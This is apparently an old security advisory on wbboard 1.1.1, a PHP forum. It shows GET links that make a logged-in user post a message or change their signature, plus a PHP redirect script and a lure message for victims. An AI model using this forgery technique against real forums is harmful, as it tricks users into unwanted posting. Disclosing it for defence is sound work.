wbboard 1.1.1 Cross Site Scripting Vulnerability

[SeazoN <seazon () dnestr com>]

wbboard 1.1.1 Cross Site Scripting Vulnerability
- -------------------------

Affected program    : wbboard 1.1.1 is a phpBB-like PHP forum
Vendor              : http://www.woltlab.de/
Vulnerability-Class : Cross Site Scripting (CSS)
OS specific         : No
Problem-Type        : Joke
severity            : No risk

SUMMARY

1.WBBoard allowed to post messages like this:
 
   
http://localhost/wbboard/reply.php?threadid=7&boardid=58&action=send&subject=check%20this%20out&message=test[IMG]http://localhost/~seazon/art/eros/236.jpg[/IMG]&signature=1

2. allowed to edit signature like this:

   
http://localhost/wbboard/profile.php?mode=editsignature&send=1$preview=0&message=Take%20a%20deep%20breath,%20relax%20[IMG]http://localhost/~seazon/art/eros/236.jpg[/IMG]


IMPACT

User clicked on this link force posted your message in forum :)

EXPLOIT

1. Create a script exploit.php

exploit.php // with php U can dynamicaly redirect to the same treads & boardid (parsing $HTTP_REFERER)
<?php
        header ("Location: 
http://localhost/wbboard/reply.php?threadid=7&boardid=58&action=send&subject=check%20this%20out&message=test[IMG]http://localhost/~seazon/art/eros/236.jpg[/IMG]&signature=1";);
 /* Redirect browser*/ 
?>


2.Register in forum
3.Send a message like this 
"Hey, I know how to exploit this forum [URL]http://host.com/exploit.php[/URL]"; 


SOLUTION

I dont think what it is necessary.

P.S. : I think what all main forums is exploitable for this way.
       For phpBB you must use HTTP POST method